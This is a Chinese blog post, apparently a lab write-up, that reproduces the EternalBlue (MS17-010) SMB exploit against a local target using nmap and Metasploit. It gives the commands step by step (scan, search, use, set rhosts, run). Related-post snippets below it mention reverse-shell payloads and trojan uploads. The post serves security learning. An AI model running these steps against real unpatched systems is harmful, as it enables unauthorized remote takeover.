利用Metasploit实现永恒之蓝漏洞复现

最新推荐文章于 2023-12-29 13:17:06 发布
最新推荐文章于 2023-12-29 13:17:06 发布
阅读量247 收藏 1
点赞数
文章标签: 信息安全 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxffdfh/article/details/132149759
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

本次实验主要利用Linux系统自带的Metasploit实现永恒之蓝漏洞的复现,具体步骤如下:

一、永恒之蓝是什么?

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

二、实现步骤

1.sudo su

获取超级管理员权限
在这里插入图片描述

2.nmap --script=vuln 192.168.0.5

利用nmap扫描目标靶机是否存在永恒之蓝漏洞
在这里插入图片描述
发现ms17-010是永恒之蓝的序列号,目标靶机存在永恒之蓝漏洞

3.msfconsole

打开metasploit
在这里插入图片描述

4.search ms17-010

搜索永恒之蓝序列号
在这里插入图片描述

5.use 0

使用永恒之蓝模块
在这里插入图片描述

6.show options

查看配置模块
在这里插入图片描述

7.set rhosts 192.168.0.5

配置目标靶机ip
在这里插入图片描述

8.run

运行模块
在这里插入图片描述

9.成果

通过漏洞攻击得到的目标主机ipconfig在这里插入图片描述
目标主机ipconfig
在这里插入图片描述

总结

通过本次实验我了解到了Linux系统里面自带了很多有用的工具,例如Metasploit,使复杂的漏洞攻击简单化。我还了解到利用Metasploit实现漏洞攻击的步骤一般为:打开模块-配置模块-运行模块。

Day Day Up!!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝复现kaliwin7
07-19
永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验旨在通过模拟攻击流程,了解并掌握“永恒之蓝漏洞利用方法及其防御措施...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
metasploit简单使用:复现永恒之蓝
qq_45496593的博客
01-13 2113
实验环境: kali 192.168.153.135 win7 192.168.153.138 1、终端启动metasploit sudo msfdb init && msfconsole 2、检测靶机是否存在ms17-010漏洞 (1)查找ms17-010相关模块 search ms17-010 (2)使用ms17-010扫描模块,对靶机Win7进行扫描 使用模块 use auxiliary/scanner/smb/smb_ms17_010 查看需要的配置 show options
漏洞工具】Metasploit框架永恒之蓝
孤桜懶契
06-19 341
MSF - 爆破模块 环境http://www.phpstudy.net 查找爆破模块的姿势 1、查找服务名 search type:auxiliary ssh 2、查找服务器+关键词 3、 SSH密码爆破 4、Mysql密码爆破 5、phpmyadmin登陆验证爆破 案例:phpMyAdmin爆破实操 环境http://59.63.200.79:8805/phpmyadmin/ ...
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5411
使用Kali Linux Metasploit复现永恒之蓝
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4556
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2492
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
0x20.第二十课 MetaSploit检测复现永恒之蓝.pdf
06-24
本课程主要介绍如何使用MetaSploit框架来检测复现著名的“永恒之蓝”(EternalBlue)漏洞。该漏洞是微软在2017年发布的MS17-010安全更新中修复的一个严重漏洞。该漏洞允许攻击者通过向目标系统的Microsoft服务器...
永恒之蓝测试.docx
07-23
永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描目标主机的开放端口和服务。命令为:`nmap –Pn –Sv –T4 IP 地址`,其中 `-Pn` ...
小计一次永恒之蓝实战
08-20
在本次实战中,可以使用Metasploit来进一步利用MS17-010漏洞实现对目标系统的控制。 ##### Metasploit利用MS17-010漏洞步骤: 1. **设置Meterpreter会话**:选择一个适合的payload,例如`windows/shell/reverse_...
metasploit(msf)复现MS17-010(经典的永恒之蓝)SMB漏洞
zsisle的博客
07-13 2211
MS17-010漏洞:恶意代码会扫描开放445文件共享端口(SMB)的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。...
渗透测试工具-Metasploit使用复现永恒之蓝漏洞
weixin_53440207的博客
02-23 1047
metasploit使用以及复现永恒之蓝漏洞
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 3465
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
网络渗透系列(三)Kali渗透工具- metasploit利用永恒之蓝漏洞攻击Windows系统全流程(全程干货、火爆连载更新中...)
最新发布
Midheart1的博客
12-29 825
永恒之蓝漏洞Windows10及之前的系统都存在永恒之蓝漏洞,有很多业界大佬纷纷提出过这个事情,所以永恒之蓝这个经典案例依然值得学习和深入开发。
linux 内核支持sctp,Linux 内核 SCTP 协议漏洞分析与复现 (CVE-2019-8956)
weixin_35763448的博客
05-01 647
一、 漏洞背景Linux 内核 SCTP 协议实现中存在一个安全漏洞 CVE-2019-8956(CNVD-2019-06182、CNNVD-201902-823 ),可以导致拒绝服务。该漏洞存在于net/sctp/socket.c中的sctp_sendmsg()函数,该函数在处理 SENDALL 标志操作过程时存在use-after-free漏洞。二、 SCTP协议简介流控制传输协议(Strea...
Linux-dirty pipe内核提权漏洞复现-编号:CVE-2022-0847
08-31 1304
漏洞属于Linux提权漏洞, 攻击者可利用漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限,非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛提权),很多人应该了解并且能利用漏洞。...
Metasploit 利用 MS17-010漏洞永恒之蓝
test
11-20 1万+
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS17-10(永恒之蓝) ...
利用Metasploit永恒之蓝漏洞渗透win10
05-02
永恒之蓝漏洞是一个远程代码执行漏洞,它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。该漏洞可以使攻击者通过网络获取Windows系统的控制权,而无需进行身份验证。 以下是使用Metasploit进行永恒之蓝漏洞渗透...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值